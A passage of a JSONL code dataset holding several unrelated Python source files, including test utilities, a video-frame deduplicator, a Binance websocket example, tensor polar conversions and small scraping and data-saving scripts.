include_field_names=True) as cursor:\n query_result = [r async for r in cursor]\n validate_query_result(student_key, student_val, query_result)\n\n async with client.sql(select_kv_query, include_field_names=True) as cursor:\n query_result = [r async for r in cursor]\n validate_kv_query_result(student_key, student_val, query_result)\n\n return inner_async() if isinstance(client, AioClient) else inner()\n","sub_path":"tests/common/test_sql_composite_key.py","file_name":"test_sql_composite_key.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"143637345","text":"import os\n\n\ndef count_sard_folders(imagepath):\n counter = 0\n dirname = os.path.dirname(imagepath)\n for item in os.listdir(dirname):\n if os.path.isdir(os.path.join(dirname, item)):\n if item.startswith('SARD'):\n counter += 1\n return counter\n\n\nclass FailedToRename(Exception):\n pass\n\n\ndef rename_sard_folder(imagepath):\n dirname = os.path.dirname(imagepath)\n sardfolder = os.path.join(dirname, 'SARD')\n if not os.path.exists(sardfolder):\n return False\n newsardfolder = os.path.join(dirname, 'SARD.old')\n if os.path.exists(newsardfolder):\n def nextFolder(newsardfolder):\n for x in range(2, 20):\n if not os.path.exists(newsardfolder+str(x)):\n return newsardfolder+str(x)\n raise FailedToRename(newsardfolder)\n newsardfolder = nextFolder(newsardfolder)\n os.rename(sardfolder, newsardfolder)\n return True\n","sub_path":"sard-admin/sardadmin/folders.py","file_name":"folders.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"29917879","text":"AUTHOR = 'Zachary Priddy. (me@zpriddy.com)'\nTITLE = 'Door Alert'\nMETADATA = {\n 'title': TITLE,\n 'author': AUTHOR,\n 'commands': ['start', 'stop'],\n 'interface': {\n 'devices': {\n \"contact_sensors\": {\n 'context': 'Doors/Windows that will trigger the alert.',\n 'type': 'deviceList',\n 'filter': {\n 'request': ['contact']\n }\n },\n \"lights\": {\n 'context': 'Lights that will flash.',\n 'type': 'deviceList',\n 'filter': {\n 'request': ['light']\n }\n }\n },\n 'triggers': {\n 'initial': {\n 'context': 'THIS IS AUTO GENERATED'\n },\n 'delayed': {\n 'context': 'THIS IS AUTO GENERATED'\n }\n },\n 'messages': {\n \"initial\": {\n 'context': 'Message to send when alert is started.',\n 'type': 'string'\n },\n \"delayed\": {\n 'context': 'Message to send when alert is stopped.',\n 'type': 'string'\n }\n },\n 'delays': {\n 'initial': {\n 'context': 'Time to delay after door opens before triggering alert. (seconds)',\n 'type': 'number'\n }\n }\n }\n}\n","sub_path":"Firefly/automation/door_alert/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"288748404","text":"from __future__ import print_function\nfrom __future__ import division\nimport bz2\nimport csv\nimport os\nimport sys\nimport time\nimport traceback\nfrom collections import OrderedDict\nfrom copy import deepcopy\nfrom itertools import product\nfrom xml.etree import ElementTree\n#sys.path.append(\"/Users/pegdwendeminoungou/Python_workplace/pymcda-master/pymcda/..\")\nsys.path.append(\"/home/pegdwende/oso-pymcda-external-server/pymcda/..\")\nfrom pymcda.types import Alternatives, Criteria, PerformanceTable\nfrom pymcda.types import AlternativesAssignments, Categories\n\nclass test_result():\n\n def __init__(self, test_name):\n self.test_name = test_name\n self.attributes = []\n self.attributes_size = {}\n\n def __getitem__(self, name):\n return getattr(self, name)\n\n def __setitem__(self, name, value):\n if name not in self.attributes:\n self.attributes.append(name)\n\n if type(value) == list:\n self.attributes_size[name] = len(value)\n else:\n self.attributes_size[name] = 1\n\n setattr(self, name, value)\n\n def __repr__(self):\n return self.test_name\n\n def set_attributes_order(self, order):\n self.attributes = set(order).union(set(self.attributes))\n\n def get_attributes(self):\n return self.attributes\n\n def get_attributes_size(self):\n return self.attributes_size\n\n def get_header(self):\n header = []\n for attr in self.attributes:\n size = self.attributes_size[attr]\n if size > 1:\n header += [ attr + \"%d\" % i for i in range(size) ]\n else:\n header += [ attr ]\n\n return header\n\n def tocsv(self, writer, fields = None):\n if fields is None:\n fields = self.get_attributes()\n\n row = []\n for field in fields:\n if type(self[field]) == list:\n for val in self[field]:\n row += [ val ]\n else:\n row += [ self[field] ]\n\n writer.writerow(row)\n\nclass test_results(list):\n\n def get(self, name, val):\n l = test_results()\n for tr in self:\n if tr[name] != val:\n continue\n\n l.append(tr)\n\n return l\n\n def unique(self, field):\n unique_values = []\n for tr in self:\n value = tr[field]\n if value not in unique_values:\n unique_values.append(value)\n\n return unique_values\n\n def set_attributes_order(self, order):\n for tr in self:\n tr.set_attributes_order(order)\n\n def summary(self, unique_fields, average_fields, min_fields = None,\n max_fields = None, std_fields = None):\n if min_fields is None:\n min_fields = average_fields\n if max_fields is None:\n max_fields = average_fields\n if std_fields is None:\n std_fields = average_fields\n\n # Research uniques values for each field\n unique_values = {}\n for uf in unique_fields:\n unique_values[uf] = self.unique(uf)\n\n # For each combination perform the average, min and max\n trs = test_results()\n\n attributes_size = self[0].get_attributes_size()\n keys = unique_values.keys()\n for indices in product(*unique_values.values()):\n tr = test_result(None)\n\n params = dict(zip(keys, indices))\n l = self\n for k in unique_fields:\n l = l.get(k, params[k])\n tr[k] = params[k]\n\n if len(l) == 0:\n continue\n\n tr[\"#\"] = len(l)\n\n for af in average_fields:\n if attributes_size[af] > 1:\n v = zip(*(r[af] for r in l))\n avg_values = [ sum(x) / len(x) for x in v ]\n for i, val in enumerate(avg_values):\n tr[\"%s%d_avg\" % (af, i)] = val\n\n if af in std_fields:\n std_values = [(1 / len(x) *\n sum((xi - sum(x) / len(x)) ** 2\n for xi in x)\n ) ** 0.5\n for x in v]\n for i, val in enumerate(std_values):\n tr[\"%s%d_std\" % (af, i)] = val\n\n if af in min_fields:\n min_values = [ min(x) for x in v ]\n for i, val in enumerate(min_values):\n tr[\"%s%d_min\" % (af, i)] = val\n\n if af in max_fields:\n max_values = [ max(x) for x in v ]\n for i, val in enumerate(max_values):\n tr[\"%s%d_max\" % (af, i)] = val\n else:\n v = [ r[af] for r in l ]\n tr[\"%s_avg\" % af] = sum(v) / len(v)\n\n if af in std_fields:\n tr[\"%s_std\" % af] = (1 / len(v) *\n sum((xi - sum(v) / len(v)) ** 2\n for xi in v)) ** 0.5\n if af in min_fields:\n tr[\"%s_min\" % af] = min(v)\n if af in max_fields:\n tr[\"%s_max\" % af] = max(v)\n\n trs.append(tr)\n\n return trs\n\n def summary_columns(self, unique_fields, column_fields, column_key):\n # Research uniques values for each field\n unique_values = {}\n for uf in unique_fields:\n unique_values[uf] = self.unique(uf)\n\n # For each combination perform the average, min and max\n trs = test_results()\n\n attributes_size = self[0].get_attributes_size()\n keys = unique_values.keys()\n for indices in product(*unique_values.values()):\n tr_unique = test_result(indices)\n\n params = dict(zip(keys, indices))\n l = self\n for k in unique_fields:\n l = l.get(k, params[k])\n tr_unique[k] = params[k]\n\n nrows = attributes_size[column_fields[0]]\n for i in range(nrows):\n tr = deepcopy(tr_unique)\n for cf in column_fields:\n tr[\"#%s\" % cf] = i\n\n col = []\n for t in l:\n suffix = t[column_key]\n tr[\"%s_%s\" % (cf, suffix)] = t[cf][i]\n col += [ t[cf][i] ]\n\n avg_value = sum(col) / len(col)\n min_value = min(col)\n max_value = max(col)\n std_value = (1 / len(col) * sum((xi - avg_value) ** 2\n for xi in col)) ** 0.5\n\n tr[\"%s_avg\" % cf] = avg_value\n tr[\"%s_std\" % cf] = std_value\n tr[\"%s_min\" % cf] = min_value\n tr[\"%s_max\" % cf] = max_value\n\n trs.append(tr)\n\n return trs\n\n def tocsv(self, writer, fields = None):\n if fields is None:\n fields = self[0].get_attributes()\n writer.writerow(fields)\n for tr in self:\n tr.tocsv(writer, fields)\n\n#following from Python cookbook, #475186\ndef has_colours(stream):\n if not hasattr(stream, \"isatty\"):\n return False\n if not stream.isatty():\n return False # auto color only on TTYs\n try:\n import curses\n curses.setupterm()\n return curses.tigetnum(\"colors\") > 2\n except:\n # guess false in case of error\n return False\nhas_colours = has_colours(sys.stdout)\n\ndef printc(*args):\n if has_colours:\n print(\"\\033[93m\", end = '')\n print(*args, end = \"\\033[0m\\n\" )\n else:\n print(*args)\n\nclass test_list():\n\n def __init__(self, classes_list = None):\n self.test_list = dict()\n if classes_list:\n for c in classes_list:\n self.get(c)\n\n def get(self, object):\n i = len(self.test_list)\n name_list = dir(object)\n for name in name_list:\n if not name.startswith('test'):\n continue\n\n method = getattr(object, name)\n i += 1\n\n self.test_list[i] = dict()\n self.test_list[i]['name'] = name\n self.test_list[i]['method'] = method\n self.test_list[i]['desc'] = method.__doc__\n\n def show(self, ids = None):\n for test in self.test_list:\n if ids and test not in ids:\n continue\n\n printc(\"* %3d. %s\" % (test, self.test_list[test]['name']))\n\n def run(self, ids = None):\n printc(\"* Tests to be run:\");\n if ids is None:\n ids = [ i for i in range(1, len(self.test_list)+1) ]\n self.show(ids)\n\n for id in ids:\n if id not in self.test_list:\n printc(\"* Test id %s not found!\" % id)\n continue\n\n printc(\"* Running %s...\" % self.test_list[id]['name'])\n if self.test_list[id]['desc']:\n printc(\"* Description: %s\" % self.test_list[id]['desc'])\n\n try:\n t1 = time.time()\n self.test_list[id]['method']()\n t2 = time.time()\n printc(\"* %s done! (after %f seconds)\" %\n (self.test_list[id]['name'], t2-t1))\n except:\n printc(\"* %s error\" % (self.test_list[id]['name']))\n traceback.print_exc(sys.stderr)\n\nclass test_list_example():\n\n def a(self):\n pass\n\n def test001_test_a(self):\n \"\"\"Just print coucou\"\"\"\n print('coucou!')\n\n def test002_b(self):\n print('beuh!')\n time.sleep(2)\n\ndef test_init(l = []):\n from optparse import OptionParser\n\n parser = OptionParser(usage = \"-t <test_ids>\")\n parser.add_option(\"-l\", \"--list\", action=\"store_true\", dest=\"show\",\n help = \"show list of tests\")\n parser.add_option(\"-t\", \"--tests\", dest = \"tests\", default=\"all\",\n help = \"run tests ids (all = All tests;\" \\\n \"ask = Display list and ask)\",\n metavar = \"test_ids\")\n\n (options, args) = parser.parse_args()\n\n tests = test_list(l)\n\n if options.show is True:\n tests.show()\n\n if options.tests == 'all':\n tests.run()\n elif options.tests == 'ask':\n tests.show()\n to_run = input(\"Which test(s) should be run? \")\n if type(to_run) == int:\n to_run = [ to_run ]\n elif type(to_run) != tuple:\n print('Invalid input');\n exit(1)\n tests.run(to_run)\n elif options.tests == 'none':\n pass\n else:\n tests.run()\n\ndef read_single_integer(variable, question):\n while not variable:\n variable = input(question + \" ? \")\n variable = int(variable)\n return variable\n\ndef read_multiple_integer(variable, question):\n while not variable:\n variable = input(question + \" ? \")\n variable = variable.split(\",\")\n variable = [int(x) for x in variable]\n return variable\n\ndef read_multiple_float(variable, question):\n while not variable:\n variable = input(question + \" ? \")\n variable = variable.split(\",\")\n variable = [float(x) for x in variable]\n return variable\n\ndef read_csv_filename(variable, default):\n while not variable:\n variable = input(\"File to save CSV data [%s] ? \" % default)\n if not variable:\n variable = default\n\n if variable[-4:] != \".csv\":\n variable += \".csv\"\n\n return variable\n\ndef parser_parse_options(*options):\n\n if \"na\" in options:\n parser.add_option(\"-n\", \"--na\", action = \"store\", type=\"string\",\n dest = \"na\",\n help = \"number of assignment examples\")\n\n if \"nc\" in options:\n parser.add_option(\"-c\", \"--nc\", action = \"store\", type=\"string\",\n dest = \"nc\",\n help = \"number of criteria\")\n\n if \"ncat\" in options:\n parser.add_option(\"-t\", \"--ncat\", action = \"store\", type=\"string\",\n dest = \"ncat\",\n help = \"number of categories\")\n\n if \"na_gen\" in options:\n parser.add_option(\"-g\", \"--na_gen\", action = \"store\", type=\"string\",\n dest = \"na_gen\",\n help = \"number of generalization alternatives\")\n\n if \"pcerrors\" in options:\n parser.add_option(\"-e\", \"--errors\", action = \"store\", type=\"string\",\n dest = \"pcerrors\",\n help = \"percentage of errors in the learning set\")\n\n if \"nseeds\" in options:\n parser.add_option(\"-s\", \"--nseeds\", action = \"store\", type=\"string\",\n dest = \"nseeds\",\n help = \"number of seeds\")\n\n if \"max_loops\" in options:\n parser.add_option(\"-l\", \"--max-loops\", action = \"store\",\n type = \"string\", dest = \"max_loops\",\n help = \"max number of loops for the \" \\\n \"metaheuristic \" \\\n \"used to find the profiles\")\n\n if \"nmodels\" in options:\n parser.add_option(\"-m\", \"--nmodels\", action = \"store\",\n type = \"string\", dest = \"nmodels\",\n help = \"Size of the population (of models)\")\n\n if \"max_oloops\" in options:\n parser.add_option(\"-o\", \"--max_oloops\", action = \"store\",\n type = \"string\", dest = \"max_oloops\",\n help = \"Max number of loops of the whole \" \\\n \"metaheuristic\")\n\n if \"filename\" in options:\n parser.add_option(\"-f\", \"--filename\", action = \"store\",\n type = \"string\", dest = \"filename\",\n help = \"filename to save csv output\")\n\nclass dataset(object):\n\n def __init__(self, name):\n self.name = name\n\n def is_complete(self):\n for obj in self.__dict__:\n if obj is None:\n return False\n return True\n\ndef load_mcda_data(csvfile, obj, *field):\n csvfile.seek(0)\n csvreader = csv.reader(csvfile, delimiter = \",\")\n try:\n obj = obj(OrderedDict({})).from_csv(csvreader, *field)\n except:\n print(\"Cannot get %s\" % obj())\n return None\n\n return obj\n\ndef load_mcda_input_data(filepath):\n\n try:\n csvfile = open(filepath, 'r')\n csvreader = csv.reader(csvfile, delimiter = \",\")\n except:\n print(\"Cannot open file '%s'\" % filepath)\n return None\n\n \n data = dataset(os.path.basename(filepath))\n data.a = load_mcda_data(csvfile, Alternatives, \"pt\")\n data.c = load_mcda_data(csvfile, Criteria, \"criterion\", None, None,\n 'direction')\n data.pt = load_mcda_data(csvfile, PerformanceTable, \"pt\",\n [c.id for c in data.c])\n \n # import pdb; pdb.set_trace()\n data.pt.round()\n data.aa = load_mcda_data(csvfile, AlternativesAssignments,\n \"pt\", \"assignment\")\n data.cats = load_mcda_data(csvfile, Categories, \"category\",\n None, \"rank\")\n\n if data.is_complete() is False:\n return None\n\n return data\n\n\ndef load_mcda_input_data_paper3(filepath):\n #print(filepath)\n try:\n csvfile = open(filepath, 'r')\n csvreader = csv.reader(csvfile, delimiter = \",\")\n except:\n print(\"Cannot open file '%s'\" % filepath)\n return None\n\n \n data = dataset(os.path.basename(filepath))\n data.a = load_mcda_data(csvfile, Alternatives, \"pt\")\n data.c = load_mcda_data(csvfile, Criteria, \"criterion\", None, None,\n 'direction')\n #import pdb; pdb.set_trace()\n data.pt = load_mcda_data(csvfile, PerformanceTable, \"pt\",\n [\"c1\",\"c2\",\"c3\",\"c4\",\"c5\",\"c6\",\"c7\"])\n \n \n data.pt.round()\n data.aa = load_mcda_data(csvfile, AlternativesAssignments,\n \"pt\", \"assignment\")\n #import pdb; pdb.set_trace()\n data.cats = load_mcda_data(csvfile, Categories, \"category\",\n None, \"rank\")\n \n if data.is_complete() is False:\n return None\n\n return data\n\n \n\ndef process_time():\n return sum(os.times()[0:-1])\n\nif __name__ == \"__main__\":\n a = test_list_example()\n tests = test_list([a])\n tests.show()\n try:\n to_run = input(\"Which one(s)? \")\n except:\n print('Invalid input!')\n exit(1)\n\n if type(to_run) == int:\n to_run = [ to_run ]\n elif type(to_run) != tuple:\n print('Invalid input');\n exit(1)\n\n tests.run(to_run)\n\nXMCDA_URL = 'http://www.decision-deck.org/2009/XMCDA-2.1.0'\n\ndef save_to_xmcda(filepath, *elems):\n #import pdb;pdb.set_trace()\n f = bz2.BZ2File(filepath, \"w\")\n xmcda = ElementTree.Element(\"{%s}XMCDA\" % XMCDA_URL)\n\n for elem in elems:\n xmcda.append(elem.to_xmcda())\n\n buf = ElementTree.tostring(xmcda, encoding=\"UTF-8\", method=\"xml\")\n f.write(buf)\n f.close()\n\ndef get_file_compression(filepath):\n magic_dict = {\n \"\\x1f\\x8b\\x08\": \"gz\",\n \"\\x42\\x5a\\x68\": \"bz2\",\n \"\\x50\\x4b\\x03\\x04\": \"zip\"\n }\n\n max_len = max(len(x) for x in magic_dict)\n\n with open(filepath) as f:\n file_start = f.read(max_len)\n\n for magic, filetype in magic_dict.items():\n if file_start.startswith(magic):\n return filetype\n\n return \"none\"\n\ndef is_bz2_file(filepath):\n if get_file_compression(filepath) == 'bz2':\n return True\n\n return False\n","sub_path":"test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":17787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"480757116","text":"#WOEFULLY INCOMPLETE\n\n#!/usr/bin/env python\n#\n# remove-duplicates.py: deletes files which have duplicate size\n# and md5sum\n#\n# by dpt\n#\n\n# source: http://www.davespace.co.uk/python/remove-duplicates.html\n# updated for python3\n\nimport os\n\n# download video\nos.system('youtube-dl \"https://www.youtube.com/watch?v=m6nUdoP6894\"')\nos.system(\"ffmpeg -i 'r4e.mp4' -vf mpdecimate,setpts=N/FRAME_RATE/TB 'r4e2.mp4'\")\n\n# get frames\nos.system(\"ffmpeg -i 'r4e.mp4' -f image2 'frames/video-frame%05d.png'\")\n\nimport hashlib\nimport os\nimport stat\nimport sys\n\nIgnore = ('Thumbs.db',)\n\ndef getmd5(filename):\n m = hashlib.md5()\n with open(filename, 'rb') as f:\n f2 = f.read()\n m.update(f2)\n return m.hexdigest()\n\ndef usage():\n sys.exit(1)\n\ndef main(argv):\n if len(argv) < 1:\n usage()\n\n dir = os.path.abspath(argv[0])\n\n # Create a dictionary keyed by size, with each entry holding a list of\n # filenames of that size.\n\n data = {}\n\n for root, dirs, files in os.walk(dir):\n for name in files:\n if name in Ignore: continue\n path = os.path.join(root, name)\n size = os.path.getsize(path)\n if not size in data:\n data[size] = []\n\n data[size].append(path)\n\n # For each key, checksum each list entry and compare.\n\n removed = 0\n\n for k in data.keys():\n dk = data[k]\n if len(dk) > 1:\n s = {}\n for j in dk:\n su = getmd5(j)\n if su in s:\n try:\n os.remove(j)\n removed += 1\n except:\n pass\n else:\n s[su] = j\n\n print('Done, %d files removed.' % (removed))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n","sub_path":"other/video_to_slides.py","file_name":"video_to_slides.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"1825341","text":"import torch\n\n\ndef convert_polar_to_cylindrical(x1, x2=None):\n '''\n converts the polar representation (i.e. magnitude and phase) of the complex tensor x1 ( or tensors x1 and x2)\n to cylindrical representation (i.e. real and imaginary)\n :param:\n x1: is a tensor contains both magnitude and phase channels in the last dims if x2=None;\n or contains only magnitude part if x2 contains phase component.\n x2: is a tensor similar to x2 or None\n '''\n\n if x2 is None: # x1 contains both magnitude and phase components\n ndims = x1.ndimension()\n mag_input = x1.narrow(ndims - 1, 0, 1).squeeze(ndims - 1)\n phase_input = x1.narrow(ndims - 1, 1, 1).squeeze(ndims - 1)\n\n real = mag_input * torch.cos(phase_input)\n imag = mag_input * torch.sin(phase_input)\n return torch.stack((real, imag), dim=x1.ndimension() - 1)\n\n else: # x1 contains magnitude component and x2 contains phase component\n real = x1 * torch.cos(x2)\n imag = x1 * torch.sin(x2)\n return real, imag\n\n\ndef convert_cylindrical_to_polar(x1, x2=None):\n '''\n converts the cylindrical representation (i.e. real and imaginary) of the complex tensor x1 ( or tensors x1 and x2)\n to polar representation (i.e. magnitude and phase)\n :param:\n x1: is a tensor contains both real and imaginary channels in the last dims if x2=None;\n or contains only real part if x2 contains imaginary component.\n x2: is a tensor similar to x2 or None\n '''\n\n if x2 is None: # x1 contains both real and imaginary components\n ndims = x1.ndimension()\n real = x1.narrow(ndims - 1, 0, 1).squeeze(ndims - 1)\n imag = x1.narrow(ndims - 1, 1, 1).squeeze(ndims - 1)\n\n mag = (real ** 2 + imag ** 2) ** (0.5)\n phase = torch.atan2(imag, real)\n phase[phase.ne(phase)] = 0.0 # remove NANs\n\n return torch.stack((mag, phase), dim=x1.ndimension() - 1)\n\n else: # x1 contains real component and x2 contains imaginary component\n mag = (x1 ** 2 + x2 ** 2) ** (0.5)\n phase = torch.atan2(x2, x1)\n\n phase[phase.ne(phase)] = 0.0 # remove NANs\n return mag, phase\n","sub_path":"utils/polar_transforms.py","file_name":"polar_transforms.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"50066220","text":"#!/usr/bin/env python\n\nimport time\nimport logging\nfrom binance.lib.utils import config_logging\nfrom binance.websocket.spot.websocket_client import SpotWebsocketClient as Client\n\nconfig_logging(logging, logging.DEBUG)\n\n\ndef message_handler(message):\n logging.info(message)\n\n\nmy_client = Client()\nmy_client.start()\n\n\n# subscribe one stream\nmy_client.instant_subscribe(\n stream=\"bnbusdt@bookTicker\",\n callback=message_handler,\n)\n\ntime.sleep(3)\n\n# subscribe multiple streams\nmy_client.instant_subscribe(\n stream=[\"bnbusdt@bookTicker\", \"ethusdt@bookTicker\"],\n callback=message_handler,\n)\n\ntime.sleep(30)\n\nlogging.debug(\"closing ws connection\")\nmy_client.stop()\n","sub_path":"examples/websocket/spot/combined_streams.py","file_name":"combined_streams.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"516082756","text":"import os\nfrom functools import reduce\n\nclass Save_data:\n '''\n 保存文件\n \n 保存到web目录中,以域名划分顶层目录,以路径划分下层目录'''\n \n WEBS_PATH = os.path.join(os.getcwd(), 'web')\n @staticmethod\n def create_dir(dirname):\n '''\n 根据url的path来创建目录'''\n\n if os.path.isdir(dirname):\n return\n\n os.mkdir(dirname)\n\n @staticmethod\n def create_file(filename, data):\n '''\n 根据url的path来创建文件'''\n\n try:\n with open(filename, 'wb') as f:\n f.write(data)\n except Exception as e:\n print('[Save_data] 保存文件失败:')\n print(e)\n\n def __init__(self, CURRENT_URL, HOSTNAME, URL_PATH, data):\n self.CURRENT_URL = CURRENT_URL\n self.data = data\n # 站点根路径\n self.ROOT_PATH = os.path.join(Save_data.WEBS_PATH, HOSTNAME)\n self.FILE_PATH = ''\n self.URL_PATH = URL_PATH\n\n def start(self): \n DIRNAME, BASENAME = os.path.split(self.URL_PATH)\n \n self.create_root()\n self.set_file_path(DIRNAME)\n # 数据的url的hostname为web根目录\n Save_data.create_dir(self.ROOT_PATH)\n Save_data.create_file(os.path.join(self.ROOT_PATH, self.FILE_PATH, BASENAME), self.data)\n\n def create_root(self):\n '''\n 创建web目录 创建站点目录'''\n\n if not os.path.isdir(Save_data.WEBS_PATH):\n os.mkdir(Save_data.WEBS_PATH)\n\n if not os.path.isdir(self.ROOT_PATH):\n os.mkdir(self.ROOT_PATH)\n\n def set_file_path(self, dirname):\n def dir_reduce(dirname_total, dirname):\n dirname_total = os.path.join(dirname_total, dirname)\n\n Save_data.create_dir(os.path.join(self.ROOT_PATH, dirname_total))\n\n return dirname_total\n\n # 文件的目录数组 [dir1, dir2, ...]\n dir_arr = list(filter(lambda item: bool(item) , str.split(dirname, '/')))\n\n self.FILE_PATH = reduce(dir_reduce, dir_arr, '')\n ","sub_path":"Save_data.py","file_name":"Save_data.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"258015977","text":"#!/usr/bin/env python\nfrom requests import *\nfrom gurl import *\nfrom ospath import *\nfrom xpath import *\nfrom webloc import *\n\nsrc = \"http://www.w3.org/community/webed/wiki/CSS/Properties_%28alphabetical_order%29\"\npath = \"//*[@id='bodyContent']/ul/li/a[not(@class='new')]\"\ncssref = join(dirname(__file__,3),\"cssref\")\n\nelements = xpath(src,path)\nproperties = dict()\nfor e in elements:\n property = e.text_content()\n url = Gurl(src).join(e.attrib[\"href\"])\n properties[property] = url\nfor property,url in properties.iteritems():\n parent = \"-\".join(property.split(\"-\")[:-1])\n if parent in properties.keys():\n dir = join(cssref,parent,property)\n else:\n dir = join(cssref,property)\n mkdir(dir)\n path = join(dir,\"WEBLOC\",\"w3.org:wiki:%s.webloc\" % property)\n Webloc(path).update(url)\n path = \"//a[@id='Values']/following::ul//code/text()\"\n for attr in xpath(url,path):\n mkdir(join(dir,attr))\n","sub_path":"_python/w3.org/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"266429453","text":"from diagnose_app.models import *\n\nclass query_table:\n\t\"\"\"\n\t this class use to query table based on conditions\n\t\"\"\"\n\tdef __init__(self,tableName,startDay,startTime,endDay,endTime,counterList):\n\t\tself.__tableName__ = tableName\n\t\tself.__startDay__ = startDay\n\t\tself.__startTime__ = startTime\n\t\tself.__endDay__ = endDay\n\t\tself.__endTime__ = endTime\n\t\tself.__counterList__ = counterList\n\t\tself.__querylist__ = [] \n\t\tself.returnQueryList = []\n\n\tdef query(self):\n\t\t\"\"\"\n\t\tthis function query all records between 'startDay startTime' and 'endDay endTime'\t\t\t\n\t\t\"\"\"\n\t\tif self.__startDay__ == self.__endDay__ and self.__startTime__ == self.__endTime__:\n\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__startDay__).filter(Time__exact=self.__startTime__)\"))\n\t\telse:\n\t\t\tif self.__startDay__ == self.__endDay__ :\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__startDay__).filter(Time__gte=self.__startTime__).filter(Time__lte=self.__endTime__)\"))\n\t\t\telse:\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__gte=self.__startDay__).filter(Day__lte=self.__endDay__)\"))\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__startDay__).filter(Time__gte=self.__startTime__)\"))\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__endDay__).filter(Time__lte=self.__endTime__)\"))\n\t\t\n\tdef query_list(self):\n\t\t\"\"\"\n\t\tthis function store the related info into returnQueryList, which is as below:\n\t\tif connterList = [counter1,counter2,counter3]\n\t\tthe returnQueryList =\n\t\t[\n\t\t\t[timeStamp1, counter1value,counter2value,counter3value],\n\t\t \t......\n\t\t]\n\t\t\"\"\"\n\t\tself.query()\n\t\tfor record in self.__querylist__:\n\t\t\ttemp_list = []\n\t\t\ttimeStamp = str(record.Day) + \" \" + str(record.Time)\n\t\t\ttemp_list.append(timeStamp)\n\t\t\tfor counter in self.__counterList__:\n\t\t\t\ttemp_list.append(eval(\"record.\"+counter))\n\t\t\tself.returnQueryList.append(temp_list)\n\t\t\t \n\t\treturn self.returnQueryList\n\n\t\n\n","sub_path":"diagnose/diagnose_app/query_table.py","file_name":"query_table.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"629839771","text":"#!/usr/bin/env python3\n#\n# Created by Samvel Khalatyan, Feb 07, 2012\n# Copyright 2011, All rights reserved\n\ndef squares(max):\n for i in range(max):\n yield i, i ** 2\n\nclass SquaresIterator:\n def __init__(self, max):\n self.i = 0\n self.max = max\n\n def __iter__(self):\n self.i = 0\n\n return self\n\n def __next__(self):\n if self.i < self.max:\n i = self.i\n self.i += 1\n return i, i ** 2\n else:\n raise StopIteration\n\nclass SquaresGenerator:\n def __init__(self, max):\n self.max = max\n\n def __call__(self):\n for i in range(self.max):\n yield i, i ** 2\n\nif \"__main__\" == __name__:\n for i, square in squares(5):\n print(\"{0:>2} {1}\".format(i, square))\n print()\n\n for i, square in SquaresIterator(5):\n print(\"{0:>2} {1}\".format(i, square))\n print()\n\n s = SquaresGenerator(5)\n for i, square in s():\n print(\"{0:>2} {1}\".format(i, square))\n","sub_path":"class/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"124241463","text":"# ==========================================================================\n#\n# Copyright NumFOCUS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0.txt\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ==========================================================================*/\n\nimport itk\nfrom sys import argv, exit\n\nitk.auto_progress(2)\n\nif argv[1] == \"Ball\":\n print(\"Ball\")\n strel = itk.FlatStructuringElement[2].Ball(int(argv[2]))\nelif argv[1] == \"Box\":\n print(\"Box\")\n strel = itk.FlatStructuringElement[2].Box(int(argv[2]))\nelse:\n print(\"invalid argument: \" + argv[1])\n exit(1)\n","sub_path":"Modules/Filtering/MathematicalMorphology/wrapping/test/FlatStructuringElementTest.py","file_name":"FlatStructuringElementTest.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"289615492","text":"# -*- coding: utf-8 -*-\n\nfrom Bio import Phylo\nfrom Bio import ExPASy\nfrom Bio import SwissProt\n\n \nfile = open(\"best_score2.xml\") #abrir ficheiro com melhores resultados do blast\nlines = file.readlines()\nfile.close() \nl=[]\n\nfor i in range(len(lines)): # o id encontra-se a seguir a \"sequence:sp|\"\n if \"sequence:sp\" in lines[i]:\n lines[i] = lines[i].split(\"|\")\n l.append(lines[i][1])\nd={} #guardar a informação num dicionário: nome da espécie são as chaves e a sequencia são os valores\nfor i in l: \n try: #try para garantir que o acesso à UniProt correu bem\n handle = ExPASy.get_sprot_raw(i)\n record = 